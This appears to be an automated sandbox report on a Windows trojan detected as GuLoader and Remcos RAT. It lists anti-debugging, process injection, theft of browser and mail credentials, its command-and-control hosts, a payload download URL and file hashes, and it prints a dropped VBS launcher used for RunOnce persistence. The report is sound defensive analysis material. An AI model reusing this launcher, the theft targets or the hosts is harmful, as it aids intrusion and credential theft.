      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Window / User API: threadDelayed 9093
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Window / User API: foregroundWindowGot 536
      Source: C:\Users\user\Desktop\loKmeabs9V.exe TID: 2000 Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\Desktop\loKmeabs9V.exe TID: 5704 Thread sleep count: 9093 > 30
      Source: C:\Users\user\Desktop\loKmeabs9V.exe TID: 5704 Thread sleep time: -45465s >= -30000s
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Thread sleep count: Count: 9093 delay: -5
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_0040AE51 FindFirstFileW,FindNextFileW,
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 23_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 24_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_00418981 memset,GetSystemInfo,
      Source: loKmeabs9V.exe, 00000000.00000002.336058548.00000000022C0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\yourphone.exe\subfolder1Software\Microsoft\Windows\CurrentVersion\RunOnceStartup key
      Source: loKmeabs9V.exe, 00000000.00000002.336058548.00000000022C0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\loKmeabs9V.exe System information queried: ModuleInformation
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process information queried: ProcessInformation

      Anti Debugging:

      Hides threads from debuggers
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process queried: DebugPort
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B962D rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B6694 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 22_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B548E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B2C93 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B36C3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B7B16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B87E3 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Code function: 0_2_022B73F1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\loKmeabs9V.exe Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      Injects a PE file into a foreign processes
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Memory written: C:\Users\user\Desktop\loKmeabs9V.exe base: 400000 value starts with: 4D5A
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Memory written: C:\Users\user\Desktop\loKmeabs9V.exe base: 400000 value starts with: 4D5A
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Memory written: C:\Users\user\Desktop\loKmeabs9V.exe base: 400000 value starts with: 4D5A
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Process created: C:\Users\user\Desktop\loKmeabs9V.exe 'C:\Users\user\Desktop\loKmeabs9V.exe'
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Process created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml'
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Process created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf'
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Process created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny'
      Source: loKmeabs9V.exe, 0000000E.00000002.1287036124.0000000000FB0000.00000002.00000001.sdmp, Binary or memory string: Program Manager
      Source: loKmeabs9V.exe, 0000000E.00000002.1287036124.0000000000FB0000.00000002.00000001.sdmp, Binary or memory string: Shell_TrayWnd
      Source: loKmeabs9V.exe, 0000000E.00000002.1287036124.0000000000FB0000.00000002.00000001.sdmp, Binary or memory string: Progman
      Source: logs.dat.14.dr, Binary or memory string: [ Program Manager ]
      Source: loKmeabs9V.exe, 0000000E.00000002.1287036124.0000000000FB0000.00000002.00000001.sdmp, Binary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 0_2_022B73AF cpuid
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Queries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 22_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 23_2_00407C79 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: 22_2_0041739B GetVersionExW,
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      GuLoader behavior detected
      Source: Initial file, Signature Results: GuLoader behavior
      Yara detected Remcos RAT
      Source: Yara match, File source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, type: MEMORY
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Tries to steal Instant Messenger accounts or passwords
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Key opened: HKEY_CURRENT_USER\Software\Paltalk
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
      Tries to steal Mail credentials (via file access)
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
      Tries to steal Mail credentials (via file registry)
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: ESMTPPassword
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword
      Source: C:\Users\user\Desktop\loKmeabs9V.exe, Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword

      Remote Access Functionality:

      Yara detected Remcos RAT
      Source: Yara match, File source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Native API (1) | Application Shimming (1) | Application Shimming (1) | Deobfuscate/Decode Files or Information (1) | OS Credential Dumping (1) | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Scheduled Task/Job | Registry Run Keys / Startup Folder (11) | Access Token Manipulation (1) | Obfuscated Files or Information (3) | Input Capture (11) | Account Discovery (1) | Remote Desktop Protocol | Data from Local System (1) | Exfiltration Over Bluetooth | Encrypted Channel (2) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection (112) | Software Packing (12) | Credentials in Registry (2) | File and Directory Discovery (1) | SMB/Windows Admin Shares | Email Collection (1) | Automated Exfiltration | Non-Standard Port (1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder (11) | Masquerading (1) | Credentials In Files (1) | System Information Discovery (329) | Distributed Component Object Model | Input Capture (11) | Scheduled Transfer | Non-Application Layer Protocol (2) | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion (23) | LSA Secrets | Security Software Discovery (731) | SSH | Clipboard Data (1) | Data Transfer Size Limits | Application Layer Protocol (212) | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Access Token Manipulation (1) | Cached Domain Credentials | Virtualization/Sandbox Evasion (23) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
      External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection (112) | DCSync | Process Discovery (4) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Application Window Discovery (1) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
      Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery (1) | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

      Behavior Graph

      Behavior Graph ID: 457916, Sample: loKmeabs9V.exe, Startdate: 02/08/2021, Architecture: WINDOWS, Score: 100
      • Start: Found malware configuration; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 8 other signatures; started process loKmeabs9V.exe
      • loKmeabs9V.exe (first process): Detected unpacking (changes PE section rights); Tries to steal Mail credentials (via file registry); Creates autostart registry keys with suspicious values (likely registry only malware); 5 other signatures; started process loKmeabs9V.exe
      • loKmeabs9V.exe (second process): contacts 101.99.94.119, 49734, 80, SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia and wealthyrem.ddns.net 194.5.97.128, 39200, 49735, 49736, DANILENKODE Netherlands; dropped C:\Users\user\AppData\Local\...\yourphone.exe (PE32) and C:\Users\user\AppData\Local\...\yourphone.vbs (ASCII); Tries to detect Any.run; Hides threads from debuggers; Installs a global keyboard hook; Injects a PE file into a foreign processes; started three further loKmeabs9V.exe processes
      • loKmeabs9V.exe (third process): Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file access)
      • loKmeabs9V.exe (fourth process): contacts 192.168.2.1 unknown unknown; Tries to harvest and steal browser information (history, passwords, etc)

      Screenshots


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source: loKmeabs9V.exe, Detection: 20%, Scanner: Virustotal
      Source: loKmeabs9V.exe, Detection: 13%, Scanner: ReversingLabs, Label: Win32.Trojan.Vebzenpak
      Source: loKmeabs9V.exe, Detection: 100%, Scanner: Joe Sandbox ML

      Dropped Files

      Source: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe, Detection: 100%, Scanner: Joe Sandbox ML
      Source: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe, Detection: 20%, Scanner: Virustotal
      Source: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe, Detection: 6%, Scanner: Metadefender
      Source: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe, Detection: 13%, Scanner: ReversingLabs, Label: Win32.Trojan.Vebzenpak

      Unpacked PE Files

      Source: 22.2.loKmeabs9V.exe.400000.0.unpack, Detection: 100%, Scanner: Avira, Label: HEUR/AGEN.1116566
      Source: 23.2.loKmeabs9V.exe.400000.0.unpack, Detection: 100%, Scanner: Avira, Label: HEUR/AGEN.1116590
      Source: 24.2.loKmeabs9V.exe.400000.0.unpack, Detection: 100%, Scanner: Avira, Label: HEUR/AGEN.1116590
      Source: 22.0.loKmeabs9V.exe.400000.0.unpack, Detection: 100%, Scanner: Avira, Label: TR/Patched.Ren.Gen2

      Domains

      No Antivirus matches

      URLs

      Source: http://www.imvu.comr, Detection: 0%, Scanner: URL Reputation, Label: safe
      Source: http://101.99.94.119/WEALTH_PRUuqVZw139.bin, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
      Source: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com, Detection: 0%, Scanner: Avira URL Cloud, Label: safe
      Source: http://www.ebuddy.com, Detection: 0%, Scanner: URL Reputation, Label: safe

      Domains and IPs

      Contacted Domains

      Name: wealthyrem.ddns.net, IP: 194.5.97.128, Active: true, Malicious: true, Antivirus Detection: none, Reputation: unknown

        Contacted URLs

        Name: http://101.99.94.119/WEALTH_PRUuqVZw139.bin, Malicious: true, Antivirus Detection: Avira URL Cloud: safe, Reputation: unknown

        URLs from Memory and Binaries

        Name: http://www.imvu.com/.exe, Source: loKmeabs9V.exe, 00000017.00000002.470384906.000000000019C000.00000004.00000001.sdmp, Malicious: false, Reputation: high
        Name: https://www.google.com, Source: loKmeabs9V.exe, Malicious: false, Reputation: high
        Name: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe, Source: loKmeabs9V.exe, 00000016.00000003.470222066.0000000000A02000.00000004.00000001.sdmp, Malicious: false, Reputation: high
        Name: http://www.imvu.comr, Source: loKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Malicious: false, Antivirus Detection: URL Reputation: safe, Reputation: unknown
        Name: https://support.google.com/chrome/answer/6258784, Source: loKmeabs9V.exe, 00000016.00000003.471770618.0000000000A18000.00000004.00000001.sdmp, Malicious: false, Reputation: high
        Name: http://www.imvu.com, Source: loKmeabs9V.exe, Malicious: false, Reputation: high
        Name: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png, Source: loKmeabs9V.exe, 00000016.00000002.473021402.00000000006E8000.00000004.00000020.sdmp, Malicious: false, Reputation: high
        Name: https://support.google.com/chrome/?p=plugin_flash, Source: loKmeabs9V.exe, 00000016.00000003.471770618.0000000000A18000.00000004.00000001.sdmp, Malicious: false, Reputation: high
        Name: https://www.google.com/accounts/servicelogin, Source: loKmeabs9V.exe, Malicious: false, Reputation: high
        Name: https://login.yahoo.com/config/login, Source: loKmeabs9V.exe, Malicious: false, Reputation: high
        Name: http://www.nirsoft.net, Source: loKmeabs9V.exe, 00000016.00000002.472368637.0000000000193000.00000004.00000001.sdmp, Malicious: false, Reputation: high
        Name: http://www.nirsoft.net/, Source: loKmeabs9V.exe, loKmeabs9V.exe, 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmp, Malicious: false, Reputation: high
        Name: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com, Source: loKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Malicious: false, Antivirus Detection: Avira URL Cloud: safe, Reputation: unknown
        Name: http://www.ebuddy.com, Source: loKmeabs9V.exe, Malicious: false, Antivirus Detection: URL Reputation: safe, Reputation: unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                               IP: 194.5.97.128, Domain: wealthyrem.ddns.net, Country: Netherlands, ASN: 208476, ASN Name: DANILENKODE, Malicious: true
                               IP: 101.99.94.119, Domain: unknown, Country: Malaysia, ASN: 45839, ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY, Malicious: true

                              Private

                              IP
                              192.168.2.1

                              General Information

                              Joe Sandbox Version:33.0.0 White Diamond
                              Analysis ID:457916
                              Start date:02.08.2021
                              Start time:14:59:17
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 17m 17s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:loKmeabs9V.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Run name:Suspected Instruction Hammering Hide Perf
                              Number of analysed new started processes analysed:41
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.phis.troj.spyw.evad.winEXE@9/4@1/3
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 50.6% (good quality ratio 40.6%)
                              • Quality average: 62.4%
                              • Quality standard deviation: 38.4%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                              • TCP Packets have been reduced to 100
                              • Excluded IPs from analysis (whitelisted): 13.88.21.125, 168.61.161.212, 20.49.157.6, 23.211.4.86, 93.184.221.240, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.50.102.62, 20.54.110.249, 20.190.160.134, 20.190.160.8, 20.190.160.71, 20.190.160.4, 20.190.160.75, 20.190.160.129, 20.190.160.67, 20.190.160.132, 51.124.78.146, 20.49.150.241, 20.82.210.154
                              • Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                               • Not all processes were analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                              Simulations

                              Behavior and APIs

                               Time: 15:02:10, Type: Autostart, Description: Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.vbs
                               Time: 15:02:19, Type: Autostart, Description: Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.vbs

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASN

                               Match: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY (Associated Sample Name / URL, Detection, Context)
                               • Audio 📞 lifewire.org.HTML, malicious, 111.90.141.176
                               • bitratencrypt.exe, malicious, 111.90.149.108
                               • svchost.exe, malicious, 111.90.149.108
                               • eVF243bmXC.exe, malicious, 111.90.149.108
                               • xSnF0lxFUX.exe, malicious, 111.90.146.149
                               • QppmM7JmZd.exe, malicious, 111.90.146.149
                               • vNiyRd4GcH.exe, malicious, 111.90.146.149
                               • 4E825059CDC8C2116FF7737EEAD0E6482A2CBF0A5790D.exe, malicious, 111.90.146.149
                               • SecuriteInfo.com.Trojan.Win32.Save.a.2038.exe, malicious, 101.99.94.204
                               • Minutes of Meeting 22062021.exe, malicious, 111.90.147.240
                               • naxpJ9fFZ4.exe, malicious, 111.90.149.115
                               • dMH1IIv1a1.exe, malicious, 111.90.149.115
                               • bmaphis@cardinaltek.com_16465506 AMDocAtt.HTML, malicious, 111.90.140.91
                               • 4cDyOofgzT.xlsm, malicious, 101.99.95.230
                               • 4cDyOofgzT.xlsm, malicious, 101.99.95.230
                               • 341288734918_06172021.xlsm, malicious, 101.99.95.230
                               • 341288734918_06172021.xlsm, malicious, 101.99.95.230
                               • kctD8brhzU.exe, malicious, 111.90.146.149
                               • Rebate_612426110_06142021.xlsm, malicious, 111.90.151.193
                               • Rebate_612426110_06142021.xlsm, malicious, 111.90.151.193
                               Match: DANILENKODE (Associated Sample Name / URL, Detection, Context)
                               • 1niECmfIcE.exe, malicious, 194.5.97.94
                               • Nuzbcdoajgupgalxelbnohzzeonlplvuro.exe, malicious, 194.5.98.7
                               • RueoUfi1MZ.exe, malicious, 194.5.98.3
                               • Departamento de contadores Consejos de pago 0.exe, malicious, 194.5.98.7
                               • 04_extracted.exe, malicious, 194.5.97.18
                               • scanorder01321.jar, malicious, 194.5.98.243
                               • scanorder01321.jar, malicious, 194.5.98.243
                               • PO.exe, malicious, 194.5.98.23
                               • PO B4007121.exe, malicious, 194.5.98.7
                               • WzOSphO1Np.exe, malicious, 194.5.98.107
                               • QUOTATION-007222021.exe, malicious, 194.5.97.145
                               • PO B4007121.exe, malicious, 194.5.98.7
                               • ORDER407-395.exe, malicious, 194.5.98.23
                               • Bank Copy.pdf.exe, malicious, 194.5.98.8
                               • FATURAA No.072221.exe, malicious, 194.5.98.158
                               • Document.1-xml.eml.exe, malicious, 194.5.98.136
                               • 2 ( P-O DRAWINGS ) SUPPLY PRODUCT.exe, malicious, 194.5.98.212
                               • ynFBVCYIcu.exe, malicious, 194.5.98.195
                               • #RFQ ORDER7678432213211.exe, malicious, 194.5.98.120
                               • ORDER.exe, malicious, 194.5.98.23

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe
                              Process:C:\Users\user\Desktop\loKmeabs9V.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):114688
                              Entropy (8bit):6.65828072595929
                              Encrypted:false
                              SSDEEP:1536:hSGTBAAP0gRQhGuloEWu6Y9yaipBhHaWQmiPYDqulcgRQhWSGTBAAP:hSGTBxChTlHWu6jbfFtDXlKhWSGTBx
                              MD5:E0D74762F123EB6603898D1482EB9752
                              SHA1:EE63AF5C34A027BA8B8331DD678B15E7A87D26A6
                              SHA-256:F06E4C96E86C0F36C82D38DE0627C0B81995656C4DCBC136C0FEDDA868ED8EA0
                              SHA-512:0F1DAEC7056919C4C7662DA12F99DC5300243B039EC98F162F1F6EB391DD9905B240ABFBC63AF3D662C0BA4AE6515FA11A3352B72354EE0C7A1B4147D2C2313A
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                               • Antivirus: Virustotal, Detection: 20%
                               • Antivirus: Metadefender, Detection: 6%
                              • Antivirus: ReversingLabs, Detection: 13%
                              Reputation:low
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......J.................@..........D........P....@.................................r........................................K..(....p...[..................................................................(... .......|............................text....>.......@.................. ..`.data...\....P.......P..............@....rsrc....[...p...`...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
                              C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.vbs
                              Process:C:\Users\user\Desktop\loKmeabs9V.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):116
                              Entropy (8bit):4.966412428636319
                              Encrypted:false
                              SSDEEP:3:jfF+m8nhvF3mRDWXp5cViE2J5xAIjuHChCn:jFqhv9IWXp+N23faihCn
                              MD5:B8755622AB5BB996534972B79851BBF5
                              SHA1:1ECF426DB043D2C14B307AA695132BBD037919DA
                              SHA-256:B05ECC5EB60DFE897EBFBEBCD8FDD2B3C25B5C0FD1882F7B30F822B5B22E6A7E
                              SHA-512:7123EF8223CB676399A9E74C371B028690EF2F07F614E25B0A34104BD062CEFBD456C5B0E82EFB6E0A34C79BBB93CD6488AC55C7B25EAAFCD81298FAC6DEDC48
                              Malicious:true
                              Reputation:low
                              Preview: Set W = CreateObject("WScript.Shell")..Set C = W.Exec ("C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe")
                              C:\Users\user\AppData\Local\Temp\syqduvyml
                              Process:C:\Users\user\Desktop\loKmeabs9V.exe
                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                              Category:dropped
                              Size (bytes):2
                              Entropy (8bit):1.0
                              Encrypted:false
                              SSDEEP:3:Qn:Qn
                              MD5:F3B25701FE362EC84616A93A45CE9998
                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview: ..
                              C:\Users\user\AppData\Roaming\remcos\logs.dat
                              Process:C:\Users\user\Desktop\loKmeabs9V.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):148
                              Entropy (8bit):3.323472271291229
                              Encrypted:false
                              SSDEEP:3:rklKlmvNBlfPl1NUlwi5JWRal2Jl+7R0DAlBG4LNQblovDl9il:IlKILHslj5YcIeeDAlybW/G
                              MD5:74C265BB113D25076A17CDBAED9500EB
